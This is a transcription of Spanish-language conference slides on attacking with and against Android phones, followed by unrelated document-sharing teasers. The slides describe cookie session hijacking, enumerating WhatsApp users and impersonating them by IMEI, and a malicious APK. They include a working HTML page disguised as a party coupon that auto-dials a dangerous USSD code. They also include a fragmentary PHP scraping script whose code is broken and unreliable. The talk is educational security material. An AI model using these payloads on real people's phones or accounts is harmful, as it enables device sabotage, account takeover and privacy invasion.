Tamaño: px
Comenzar la demostración a partir de la página:

Download ""

Transcripción

1

2

3

4 DISCLAIMER Todo el contenido de esta charla es resultado de investigación con fines didácticos y educativos. El autor no se hace responsable por el uso del conocimiento contenido en la siguiente presentación. La información contenida debe ser utilizada únicamente para fines éticos y con la debida autorización. Todo descubrimiento realizado, ha sido y será usado de forma legal. La audiencia debe asumir todo lo que se exponga hoy, como falso y sin fundamento hasta que lo compruebe personalmente. Limahack no es el autor directo de ninguno de los descubrimientos expuestos, ni de las herramientas demostradas, ni los conoce. Todas las opiniones vertidas durante esta presentación son exclusivas del expositor, Limahack no es responsable de ninguna de las opiniones vertidas.

5

6 aula H4XOR Android mobile hacking: ataques y atacando con el androide Omar Palomino Por qué Android? Ataques a Sistemas Operativos Windows - Linux Ataques a redes LAN desde Android Atacando a sistemas Android

7 Quién soy? Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas Certificado CEHv7, Security+, ITILv3 Consultor en Seguridad de información Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres: omarc320@gmail.com

8 Por qué Android? Participación en el mercado de Sistemas Operativos móviles 5% 17% 4% 4% 2% 0% 68% Android IOS Blackberry Symbian Windows Linux Otros

9 Por qué Android? Otros sistemas operativos ya no tienen participación en el mercado (RIP Blackberry) Los hackers están buscando nuevos objetivos (nuevos retos!!), siempre a la vanguardia.

10 Por qué Android? Se pueden realizar ataques cada vez mas sigilosos (ya no es necesario una laptop para realizar ataques) Es muy común que a través de Android nos. Conectamos a redes wireless libres Accedamos a correo electrónico Accedamos a redes sociales Realicemos transacciones financieras

11 La agenda de hoy: Atacando S.O Windows Forense de tráfico generado x Android Ataques de red LAN Android vs Metasploit

12 Requisitos: Tener el Android rooteado (super privilegios). Todas las herramientas interesantes requieren de super-privilegios. Analizar la mejor situación para realizar un ataque. Utiliza tu Android es un gran amigo.

13 Atacando Windows Tool: Anti (Android Network Toolkit) Con Anti podemos: Buscar vulnerabilidades Auditoría de passwords Ataques de man in the middle Ejecutar comandos en el SO Descubrir tráfico inseguro en la red

14 Atacando Windows

15 Atacando Windows USO DE NMAP SCANEO DE PUERTOS DETECCIÓN DE SIST. OPERATIVO SCRIPT DE VERIFICACIÓN DE VULNERABILIDADES

16 Atacando Windows

17 Atacando una red LAN Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook, Hotmail, Twitter) El código fuente es libre: Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear. WTF!!!! La comunidad XDA-developers sigue sacando nuevas versiones del software. (

18 Atacando una red LAN Funcionamiento: Session Hijacking 1 El usuario ha ingresado normalmente a una aplicación web comercial o corporativo, como: Hotmail Facebook Twitter 2 DROIDSHEEP capturas las cookies asociadas a la sesión creada y las utiliza. No es necesario capturar la contraseña.

19 Atacando una red LAN Funcionamiento: Session Hijacking Droidsheep reconoce las cookies de aplicaciones como Facebook y Hotmail, además te puedes enviar las cookies por correo electrónico.

20 Atacando una red LAN

21 Análisis de Tráfico Android Cada vez utilizamos nuestros celulares para conectarnos a Internet. La mayoría de las personas se conecta a redes wireless abiertas. Como TÚ!!! Muchas aplicaciones no encriptan la información que envían, las envían en texto plano.

22 Por qué es interesante analizar el tráfico de red.?

23 Por qué es interesante analizar el tráfico de red.?

24 Análisis de tráfico - Whatsapp Whatsapp se ha convertido en un mecanismo para el envío de mensajes muy popular. Es muy parecido a los SMS pero gratuito (hasta el momento). Tiene serios problemas para dar seguridad a la información que envía hacia internet porque enviaba todo en texto claro. Ahora envía la información con un HASH MD5

25 Pero es sólo un simple MD5 Whatsapp tiene serios problemas de seguridad, analicemos: Cada vez que Whatsapp inicia debe verificar si tus contactos cuentan con una cuenta activada. Para eso se conecta a una URL y consulta el estado de tus contactos, por ejemplo: <A>:Código de país del número a consultar <B>: Número a consultar <C>: Cualquier número de WhatsApp (o el mismo número)

26 Pero es sólo un simple MD5 Número del teléfono consultado Estado y mensaje del Whatsapp Número del teléfono consultado

27 Cuánta gente tiene Whatsapp en el Perú? El ministerio de transportes y comunicaciones nos dará una manito:

28 <?php mysql_connect("localhost","root", password"); mysql_select_db("limahakc2012"); for($i= ; $i<= ;$i++){ Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR $whatsapp =" $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,curlopt_useragent,'whatsapp/2.6.7 iphone_os/5.0.1 Device/Unknown_(iPhone4,1)'); curl_setopt($ch, CURLOPT_URL, $whatsapp); $cuerpo = curl_exec($ch); curl_close($ch); &u[]= if (preg_match('/<key>/',$cuerpo)) { $explodeo_datos = explode('<dict>',$cuerpo); $explodeo_estado = explode('<key>s</key>',$explodeo_datos[1]); $explodeo_estado = explode('<key>jid</key>',$explodeo_estado[1]); }}?> $query1 ="insert into WhatsApp_users3 (numero,mensaje,status) values ('".$i."','".$$explodeo_estado[0]."',1) "; mysql_query($query1);

29 EL ATAQUE:

30 Cómo envía Whatsapp los mensajes? WhatsApp tiene un mecanismo de autenticación basado en SASL DIGEST MD5. Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password, pero obviamente el password no se envía ya que sirve para generar el CHALLENGE (MD5) PASSWORD? Pero si nunca pusimos un password. El password es: Android: IME (International Mobile Equipment Identity) Iphone y otros: la MAC

31 WhatsApp - API API no oficial de WhatsApp Está bajo licencia MIT refer to the source code for the extra line INGENIERIA REVERSA

32 El ataque: obteniendo el IMEI Si obtenemos el IMEI podemos suplantar una identidad de alguien y ademas recibir sus mensajes. OJO: Si te haces pasar por esa persona y recibes los mensajes, la verdadera persona no los recibirá. Moraleja: El celular es como el calzoncillo.. No se presta a nadie a nadie!!!

33 EL ATAQUE:

34 Atacando Android

35 Atacando Android Utilizaremos el Android Virtual Device para hacer nuestras pruebas. El objetivo es obtener información sensible de los teléfonos celulares. Lo más importante es tener actualizado siempre el celular. A veces, no basta con tenerlo actualizado porque sólo se sacan actualizaciones para los últimos modelos.

36 Atacando Android Utilizaremos un módulo auxiliar de Metasploit para realizar el ataque.

37 Atacando Android

38 EL ATAQUE:

39 Códigos USSD El USSD (acrónimo de Unstructured Supplementary Service Data, Servicio Suplementario de Datos no Estructurados en inglés) es un servicio para el envío de datos a través de móviles GSM, al igual que el SMS. Es usado normalmente para comunicación con el proveedor de telefonía, generalmente para servicios de mensajería en tiempo real. Aquí algunos códigos USSD: *#06# *150# *2767*3855# (no deberías ejecutar este)

40 Códigos USSD Así como existe los links para enviar correo: <a Enviar </a> También existe el mail para LLAMAR : <a href="tel: ">llamar LIMAHACK</a> Algunos códigos USSD no necesitan la intervención de marcado para ser ejecutados, simplemente se ejecutan, pueden probar esto: *#06# Entonces que pasa si

41 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:

42 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:

43 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:

44 EL ATAQUE: <html> <head> <title>fiesta LimaHack 2012</title> <meta http-equiv="refresh" content="0;url=tel *2797*3855%23 "> </head></body> </html>

45 Aplicaciones APK Maliciosas > Se han heredado todas las malas costumbres del mundo Windoneano, todos instamos dando NEXT, NEXT, NEXT > Sabemos lo que realmente estamos instalando en nuestro celular?

46 Google Play y la política.. Información personal y confidencial: no se permite la divulgación o la publicación no autorizada de información de carácter privado o confidencial de los usuarios (como números de tarjetas de crédito, de la Seguridad Social, del permiso de conducir o de otros documentos ) ni de cualquier otra información que no sea de acceso público. El problema es que NADIE lo verifica.

47 Instalaremos una aplicación mo.reservations

48 Google Play y la política.. Antes de instalar el APK: Después de instalar: Créditos: billy.grados@gmail.com Developer de aplicaciones para Android

49 Google Play y la política..

50 Google Play y la política..

51 Google Play y la política..

52 EL ATAQUE:

53 Conclusiones Android es una herramienta muy potente para realizar pruebas básicas de penetración de sistemas, a nivel de sistema operativo y redes LAN. WhatsApp presenta debilidades de seguridad de información importantes. El celular nunca se presta!!!! Nunca!! Existen diversas vulnerabilidades en sistemas Android : Códigos USSD y a través de Metasploit para versiones antiguas de Android. Google Play tiene una política de seguridad de información, sin embargo, no verifica que las aplicaciones cumplan con dicha política. Actualiza tu Android, verifica los permisos otorgados a cada aplicación y no instales APK files de dudosa procedencia.

54

55

1. Qué es Escudo Movistar para móviles?

1. Qué es Escudo Movistar para móviles? 1. Qué es Escudo Movistar para móviles? Es una solución de seguridad para teléfonos móviles inteligentes (Smartphones) la cual presenta una gran variedad de funcionalidades dependiendo del paquete contratado,

Más detalles

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)

Más detalles

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com

Más detalles

Preguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información

Preguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información Guía de Cifrado Preguntas y respuestas sobre el cifrado de la información personal La guía para aprender a cifrar tu información 2 Qué es lo que estamos cuidando? A través del cifrado cuidamos de fotos,

Más detalles

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Guía de Instalación Página 1 Índice ESCUDO MOVISTAR.... 3 1. INSTALACIÓN DEL SERVICIO ESCUDO MOVISTAR... 3 1.1. VERSIONES SOPORTADAS... 3

Más detalles

La única plataforma de autenticación que necesita.

La única plataforma de autenticación que necesita. La única plataforma de autenticación que necesita. Autenticación Fuerte o doble Factor? Es su elección. Nuestro enfoque tiene que ver con lograr el equilibrio correcto de la seguridad, costo y facilidad

Más detalles

Recomendaciones de Seguridad Red Social Twitter

Recomendaciones de Seguridad Red Social Twitter Recomendaciones de Seguridad Red Social Twitter Medidas de seguridad para Twitter Tras varios ataques a cuentas de reconocidas empresas, Twitter anunció nuevas medidas de seguridad. Cualquier usuario que

Más detalles

Manual aplicación móvil iphone y Android

Manual aplicación móvil iphone y Android Manual aplicación móvil iphone y Android Índice Para qué sirve la aplicación? 1 Sirve para mi teléfono? 1 Dónde la puedo descargar? 2 Registrarse en la aplicación 3 Pantalla de Inicio 5 El Club 6 Reservar

Más detalles

MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD

MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD MÓDULO 2: LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD TEMA 1 INVOICE BUBBLE Web oficial: http://invoicebubble.com Soporte/s en los que funciona: Es una aplicación web. Funcionalidades: o Crear

Más detalles

OBJETIVOS DE LA CAPACITACION

OBJETIVOS DE LA CAPACITACION OBJETIVOS DE LA CAPACITACION Cuando empiezan a funcionar tus correos. Utilizar tu correo por Web. Cambiar la contraseña de tu correo. Configurar Redireccionamientos. Crear Auto Contestadores. Configuración

Más detalles

MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD

MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD MÓDULO 2 LISTADO DE LOS DIFERENTES PROGRAMAS SOBRE CONTABILIDAD En este tema, os vamos a dar a conocer una serie de aplicaciones o programas que os pueden ser de mucha utilidad, en función a las necesidades

Más detalles

Capítulo 1. Introducción

Capítulo 1. Introducción Capítulo 1. Introducción Nombre del Tema Aspectos de seguridad en aplicaciones basadas en WIFI. Asesor: Dr. Oleg Starostenko Basarab Actualidad y Definición del problema Desde hace ya tiempo nos hemos

Más detalles

Novedades PhotoGestion 5

Novedades PhotoGestion 5 Novedades PhotoGestion 5 En este documento repasamos las novedades más importantes de la versión 5 del programa PhotoGestion. Explicaremos cada novedad, como funciona y como se configura. Contenido Envío

Más detalles

Curso de PHP con MySQL Gratis

Curso de PHP con MySQL Gratis Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este

Más detalles

GUÍA RED SOCIAL LINKEDIN

GUÍA RED SOCIAL LINKEDIN GUÍA RED SOCIAL LINKEDIN Cómo sacarle el máximo partido a Linkedin para crecer profesionalmente Linkedin, es una de las redes profesionales más potentes del mundo Qué es una Linkedin Linkedin, es una de

Más detalles

SMS para empresas de software

SMS para empresas de software SMS para empresas de software Automatiza el envío de SMS fácilmente Cada vez hay más empresas que utilizan SMS, tanto si tu empresa vende software como páginas web o aplicaciones. Te recomendamos que les

Más detalles

Empresas. Guía de uso. App Mi Movistar Empresas

Empresas. Guía de uso. App Mi Movistar Empresas Empresas Guía de uso App Mi Movistar Empresas Índice 1. Ventajas del nuevo Mi Movistar 3 2. Tipos de usuarios de Mi Movistar 4 3. Cómo acceder a Mi Movistar 5 4. Acceso Aplicación 6-9 5. Navegación y opciones

Más detalles

Barómetro Splio sobre aperturas email marketing en móvil 1r semestre 2012 Splio

Barómetro Splio sobre aperturas email marketing en móvil 1r semestre 2012 Splio Splio es una empresa de marketing directo, especializada en email marketing, sms marketing y CRM social. Desde su creación en París en 2001, Splio solamente trabaja con empresas que están comprometidas

Más detalles

Analítica para tu Tienda Online

Analítica para tu Tienda Online Analítica para tu Tienda Online Mide, analiza y actúa para mejorar tus resultados Índice 1. Qué es la analítica 2. Configura tu Tienda Online para utilizar tu herramienta de analítica 3. Métricas más habituales

Más detalles

Tu número y tu línea desde sólo 1,95 /mes

Tu número y tu línea desde sólo 1,95 /mes información Sin línea de teléfono. Sólo necesitas internet Tu número y tu línea desde sólo,95 /mes Tendrás tu línea IP (cuenta SIP) y un número de la provincia que elijas por tan solo,95 / mes. Si quieres

Más detalles

SMS FACEBOOK CHAT. Guía de usuario

SMS FACEBOOK CHAT. Guía de usuario SMS FACEBOOK CHAT Guía de usuario SMS Facebook CHAT Qué es SMS Facebook CHAT? Es el servicio que te permite estar online en el chat de Facebook sin necesidad de tener un plan de datos. Solo necesitas tener

Más detalles

POLÍTICA DE PRIVACIDAD PARA APLICACIONES MÓVILES GRUPOCOPESA. 1. información que se obtiene la aplicación y su utilización

POLÍTICA DE PRIVACIDAD PARA APLICACIONES MÓVILES GRUPOCOPESA. 1. información que se obtiene la aplicación y su utilización POLÍTICA DE PRIVACIDAD PARA APLICACIONES MÓVILES GRUPOCOPESA Nuestra política de privacidad se aplica al uso de las aplicaciones informáticas de los siguientes medios de comunicación: LaTercera, LaCuarta,

Más detalles

RETO HACKER DE VERANO

RETO HACKER DE VERANO RETO HACKER DE VERANO Blind XPath Reto Hacker de verano Índice 1 Introducción... 2 2 Proceso de trabajo... 2 2.1 Toma de contacto (fingerprinting)... 2 2.2 Comienza el ataque... 4 2.3 Explicacion del ataque

Más detalles

Diseño de aplicaciones móviles seguras en Android. alvaro.ospina@upb.edu.co aospina@gmail.com

Diseño de aplicaciones móviles seguras en Android. alvaro.ospina@upb.edu.co aospina@gmail.com Diseño de aplicaciones móviles seguras en Android alvaro.ospina@upb.edu.co aospina@gmail.com Agenda Que es Android? Historia? Arquitectura Herramientas Medidas de seguridad Que es Android? Pila de software

Más detalles

RETO FORENSE EPISODIO III Resumen Ejecutivo

RETO FORENSE EPISODIO III Resumen Ejecutivo RETO FORENSE EPISODIO III Resumen Ejecutivo José Antonio Valero Sánchez javalero@gmail.com Zaragoza, España 2006 Motivos de la intrusión. Después de analizar la imagen del sistema cabe destacar que el

Más detalles

Asistente RACC Móvil

Asistente RACC Móvil Smartphones Asistente RACC Móvil Para configurar Internet/servicios y resolver las posibles incidencias con tu smartphone Android. Válido para las diferentes versiones del sistema operativo Android Esta

Más detalles

Movilizando la intranet de la Facultad de Informática

Movilizando la intranet de la Facultad de Informática Movilizando la intranet de la Facultad de Informática 1 de noviembre de 2011 Jaume Moral, Hugo Hernández Marcel Arbó y Roger Sala http://www.fib.upc.edu/ La intranet: El Racó Es la Intranet de la Facultad

Más detalles

Soluciones para Lotería Móvil. www.structura.ec

Soluciones para Lotería Móvil. www.structura.ec Soluciones para Lotería Móvil 1 Lotería a través de celulares: Introducción STRUCTURA CAPITAL LATIN AMERICA S.A. es una compañía especializada en licencias de propiedad intelectual, que provee soluciones

Más detalles

Seguridad en la banca electrónica. <Nombre> <Institución> <e-mail>

Seguridad en la banca electrónica. <Nombre> <Institución> <e-mail> Seguridad en la banca electrónica Contenido Banca electrónica Principales riesgos Cuidados a tener en cuenta Fuentes Banca electrónica (1/4) Permite: realizar las mismas

Más detalles

Guía de doble autenticación

Guía de doble autenticación Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.

Más detalles

UNIDAD CENTRAL DEL VALLE DEL CAUCA

UNIDAD CENTRAL DEL VALLE DEL CAUCA UNIDAD CENTRAL DEL VALLE DEL CAUCA Implementación de la aplicación SIGA Instructivo para el manejo de la oficina virtual de los estudiantes Versión 2.0 Historial de Revisiones Fecha Versión Descripción

Más detalles

TIC s EL CORREO ELECTRÓNICO

TIC s EL CORREO ELECTRÓNICO TIC s EL CORREO ELECTRÓNICO 2 Qué es un correo electrónico? El correo electrónico también te sirve para vender tus productos o servicios. Trata de usar siempre la misma dirección, tus clientes pueden confundirse

Más detalles

CABLE & WIRELESS PANAMA PREGUNTAS FRECUENTES PLAN DATA MÓVIL MAIL

CABLE & WIRELESS PANAMA PREGUNTAS FRECUENTES PLAN DATA MÓVIL MAIL 1. Qué es el servicio de móvil Mail? CABLE & WIRELESS PANAMA PREGUNTAS FRECUENTES PLAN DATA MÓVIL MAIL Móvil mail permite a nuestros clientes de +móvil prepago y contrato configurar, enviar y recibir su

Más detalles

Configurar protección infantil en Windows XP

Configurar protección infantil en Windows XP Configurar protección infantil en Windows XP Web de la asociación española de pediatría En la web de la asociación española de pediatría podemos encontrar un link al site que han montado junto a Microsoft

Más detalles

Un sistema adecuadamente refrigerado debe mantener una temperatura de 90 110 grados.

Un sistema adecuadamente refrigerado debe mantener una temperatura de 90 110 grados. Informáticas I 2. Protección de información y Hardware Debemos tomar medidas cuando usar computadoras no sólo para mantener nuestros archivos e identidad fuerte y segura, sino también nuestros equipos.

Más detalles

Usted debe ser cliente y mantener un producto activo con el banco. 6. Qué tipo de transacciones puedo realizar en la Banca en Línea?

Usted debe ser cliente y mantener un producto activo con el banco. 6. Qué tipo de transacciones puedo realizar en la Banca en Línea? Preguntas frecuentes Banca en Línea 1. Quiénes pueden tener acceso a Banca en Línea? Toda persona natural o jurídica que cuente con un producto activo en el Banco Nacional de Panamá. 2. Cómo debo afiliarme

Más detalles

Como crear una app gratis para tu negocio con Appmakr

Como crear una app gratis para tu negocio con Appmakr Como crear una app gratis para tu negocio con 1 ÍNDICE 1 Introducción 3 2 Conceptos básicos de una App 4 Repositorios de Aplicaciones de Software libre 1 Introducción 3 INTRODUCCIÓN Introducción al concepto

Más detalles

Cómo rastrear, espiar y localizar un Celular

Cómo rastrear, espiar y localizar un Celular Cómo rastrear, espiar y localizar un Celular Preguntas Frecuentes Vista Previa del Area de Miembros Como adquirir el Programa www.comorastrearuncelular.com NOTA: Usted puede compartir esta publicacion

Más detalles

documento de retenciones e información de pagos

documento de retenciones e información de pagos retenciones. documento de retenciones e información de pagos diverza.com web. página 2 retenciones. documentos electrónicos de retenciones e información de pagos. servicio web introducción. Bienvenido

Más detalles

Transport Layer Security (TLS) Acerca de TLS

Transport Layer Security (TLS) Acerca de TLS Transport Layer Security (TLS) Acerca de TLS Contenido Correo electrónico seguro en HSBC... 2 Acerca de Transport Layer Security..... 2 Para establecer una conexión Forced TLS con HSBC... 4 Glosario...

Más detalles

REPÚBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN DIRECCIÓN GENERAL DE LA OFICINA DE ADMINISTRACIÓN Y SERVICIOS

REPÚBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN DIRECCIÓN GENERAL DE LA OFICINA DE ADMINISTRACIÓN Y SERVICIOS REPÚBLICA BOLIVARIANA DE VENEZUELA MINISTERIO DEL PODER POPULAR PARA LA EDUCACIÓN DIRECCIÓN GENERAL DE LA OFICINA DE ADMINISTRACIÓN Y SERVICIOS DIRECCIÓN DE INFORMÁTICA Y SISTEMAS DIVISIÓN DE FORMACIÓN

Más detalles

Ubuntu Server 12.10 HOW TO : SERVIDOR VPN. EN ESTE SE REALIZA LO SIGUIENTE: En este how to se le va a enseñar como usar vpn. Qué es una VPN?

Ubuntu Server 12.10 HOW TO : SERVIDOR VPN. EN ESTE SE REALIZA LO SIGUIENTE: En este how to se le va a enseñar como usar vpn. Qué es una VPN? Ubuntu Server 12.10 HOW TO : SERVIDOR VPN EN ESTE SE REALIZA LO SIGUIENTE: En este how to se le va a enseñar como usar vpn. Qué es una VPN? Una red privada virtual o VPN (Virtual Private Network), es una

Más detalles

#Hacking dispositivos ios

#Hacking dispositivos ios #Hacking dispositivos ios [iphone/ipod Touch/ ipad] Autor: Japson Índice Disclaimer...3 Introducción...3 Cambiando el password por defecto.3 Crackeando el password de OpenSSH. 4 Escenario..4 Detección

Más detalles

GUIA DEL PRODUCTO (Vendedor) CAP-PRODUCTO 1

GUIA DEL PRODUCTO (Vendedor) CAP-PRODUCTO 1 GUIA DEL PRODUCTO (Vendedor) CAP-PRODUCTO 1 DESCRIPCIÓN DEL PRODUCTO Prepago fullmóvil fullmóvil va a ofrecerle a sus clientes una línea celular prepago que funciona en cualquier teléfono Qué es Prepago

Más detalles

VÍDEO intypedia003es LECCIÓN 3: SISTEMAS DE CIFRA CON CLAVE PÚBLICA. AUTOR: Gonzalo Álvarez Marañón

VÍDEO intypedia003es LECCIÓN 3: SISTEMAS DE CIFRA CON CLAVE PÚBLICA. AUTOR: Gonzalo Álvarez Marañón VÍDEO intypedia003es LECCIÓN 3: SISTEMAS DE CIFRA CON CLAVE PÚBLICA AUTOR: Gonzalo Álvarez Marañón Consejo Superior de Investigaciones Científicas, Madrid, España Hola, bienvenidos a intypedia. Conocidos

Más detalles

Política de Privacidad LEVEL UP! GAMES

Política de Privacidad LEVEL UP! GAMES Política de Privacidad LEVEL UP! GAMES Level Up! Interactive S.A.S se compromete a proteger la privacidad de la información de los visitantes de nuestros entornos virtuales en línea. Esta política se aplica

Más detalles

Una solución a la medida de tus necesidades

Una solución a la medida de tus necesidades Una solución a la medida de tus necesidades Qué es SISCOBER? Debido a la necesidad actual del mercado y dada la importancia de la tecnología para la gestión de cobranza, SECOBER S.A. DE C.V., pone a su

Más detalles

UNIDAD CENTRAL DEL VALLE DEL CAUCA

UNIDAD CENTRAL DEL VALLE DEL CAUCA UNIDAD CENTRAL DEL VALLE DEL CAUCA Implementación de la aplicación SIGA Instructivo para el manejo de la oficina virtual de los estudiantes Versión 3.0 Historial de Revisiones Fecha Versión Descripción

Más detalles

COMO OBTENER SU MASTERCARD SECURE CODE MasterCard Secure Code

COMO OBTENER SU MASTERCARD SECURE CODE MasterCard Secure Code MasterCard Secure Code MasterCard SecureCode es el Código de Seguridad que protege contra el uso no autorizado de la tarjeta cuando se realicen compras en internet. Pasos: 1. Ingrese a una tienda virtual.

Más detalles

Detectar y solucionar infecciones en un sitio web

Detectar y solucionar infecciones en un sitio web Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales

Más detalles

Recuperación tecnología. Institución Educativa Juan María Céspedes. Once uno. Daniela Giraldo Mazo Andrea Valencia Monsalve.

Recuperación tecnología. Institución Educativa Juan María Céspedes. Once uno. Daniela Giraldo Mazo Andrea Valencia Monsalve. Recuperación tecnología Institución Educativa Juan María Céspedes Once uno Daniela Giraldo Mazo Andrea Valencia Monsalve Junio 2015 Alejandro Galvis Ingeniero de Telecomunicaciones Tabla de contenido 1.

Más detalles

APLICACIONES PARA EMPRENDEDORES

APLICACIONES PARA EMPRENDEDORES APLICACIONES PARA EMPRENDEDORES Sumario 1. INTRODUCCIÓN 2. APLICACIONES Astana Calculador freelance Evernote Hootsuite Lukkom Remember the milk Simple Mind Stratpad Team viewer Thumb Fecha actualización:

Más detalles

Manual de Ayuda. Banamex Móvil

Manual de Ayuda. Banamex Móvil Banamex Móvil Página 1 Contenido» Mis productos» Solicitud Banamex Móvil» Confirmación de Banamex Móvil» Respuesta de Banamex Móvil» Operación rechazada 2 4 10 12 13 Página 2 Mis productos Qué encuentro

Más detalles

Analítica para tu web

Analítica para tu web Analítica para tu web Mide, analiza y actúa para mejorar tus resultados Índice 1. Qué es la analítica web 2. Configura webmaker para utilizar tu herramienta de analítica web favorita 3. Métricas más habituales

Más detalles

Guía básica para subir vídeos a Youtube

Guía básica para subir vídeos a Youtube Guía básica para subir vídeos a Youtube Índice Videos en YouTube Paso 1: Crear una cuenta Paso 2: Diseñar tu canal Paso 3: Grabar y editar tu video Paso 4: Subir video Paso 5: Características del video

Más detalles

Teniendo en cuenta la importancia del material es responsabilidad de los estudiantes y padres el manejo correcto de las guías y del dispositivo.

Teniendo en cuenta la importancia del material es responsabilidad de los estudiantes y padres el manejo correcto de las guías y del dispositivo. Este manual de usuario BOOKSAM del Colegio Santa Angela Merici, es una guía práctica para realizar la descarga e instalación correcta del material de estudio, dando a conocer paso a paso el funcionamiento,

Más detalles

Dropbox - Inicio rápido

Dropbox - Inicio rápido Dropbox - Inicio rápido Qué es Dropbox? Dropbox es un software que enlaza a todas tus computadoras mediante de una sola carpeta. Es la manera más fácil de respaldar y sincronizar archivos entre computadoras.

Más detalles

Seguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos.

Seguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Seguridad en Administración de Redes INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Administración de Seguridad en Redes La administración

Más detalles

RESOLUCIÓN DE INCIDENCIAS PROCURADORES

RESOLUCIÓN DE INCIDENCIAS PROCURADORES RESOLUCIÓN DE INCIDENCIAS PROCURADORES Información para el CAU: Acceso al aplicativo: Una incidencia que se ha dado mucho es que les salía la siguiente pantalla de error al acceder al aplicativo: Esta

Más detalles

WEB APP VS APP NATIVA

WEB APP VS APP NATIVA WEB APP VS APP NATIVA Agosto 2013 Por Jesús Demetrio Velázquez 1 Ya decidió hacer su aplicación en Web App o App Nativa? Debido a que surgieron varias preguntas relacionadas con nuestro artículo Yo Mobile,

Más detalles

TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR

TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR El TPV (Terminal Punto de Venta) Virtual es un producto dirigido a empresas y comercios, con tienda en internet, que permite el cobro de las ventas realizadas

Más detalles

Fácil manipulación ya que no la recibirás físicamente evitando que se extravíe o deteriore.

Fácil manipulación ya que no la recibirás físicamente evitando que se extravíe o deteriore. FACTURA ELECTRÓNICA ASPECTOS GENERALES La validez de una factura electrónica es exactamente la misma que una factura en papel y gracias a la certificación efectuada por el SRI se garantiza su integridad

Más detalles

plan de marketing online 2015 No está permitida la reproducción íntegra o parcial de este documento sin el consentimiento explícito de Milsi.

plan de marketing online 2015 No está permitida la reproducción íntegra o parcial de este documento sin el consentimiento explícito de Milsi. plan de marketing online 2015 Última edición: Persona responsable: introducción En Milsi.com creemos en la importancia de un buen plan de Marketing, hoy por hoy no basta con un buen diseño web. Somos expertos

Más detalles

Tu centralita desde sólo 14 /mes

Tu centralita desde sólo 14 /mes información Sin línea de teléfono. Sólo necesitas internet Tu centralita desde sólo 14 /mes Tendrás extensiones (cuentas SIP), cuatro canales de voz, el servicio de centralita y un número de la provincia

Más detalles

Departamento CERES Área de Tarjetas Inteligentes Manual de Usuario

Departamento CERES Área de Tarjetas Inteligentes Manual de Usuario 14 CORREO SEGURO. Hay aplicaciones de correo que permiten enviar y recibir correos cifrados y firmados digitalmente utilizando criptografía. Estas operaciones garantizan el intercambio seguro de información,

Más detalles

Manual de iniciación a

Manual de iniciación a DOCUMENTACIÓN Picasa y otras nubes Manual de iniciación a DROPBOX 1 Últimamente se ha hablado mucho de la nube y de cómo es el futuro de la Web. También se han presentado servicios y aplicaciones que ya

Más detalles

Hemos creado una cuenta para el AlmeríaChapter en Dropbox (servicio gratuito) que nos permite compartir fotos, videos,... desde cualquier lugar.

Hemos creado una cuenta para el AlmeríaChapter en Dropbox (servicio gratuito) que nos permite compartir fotos, videos,... desde cualquier lugar. Hemos creado una cuenta para el AlmeríaChapter en Dropbox (servicio gratuito) que nos permite compartir fotos, videos,... desde cualquier lugar. Los pasos para poder hacerlo son muy sencillos. Si ya tienes

Más detalles

Ataques XSS en Aplicaciones Web

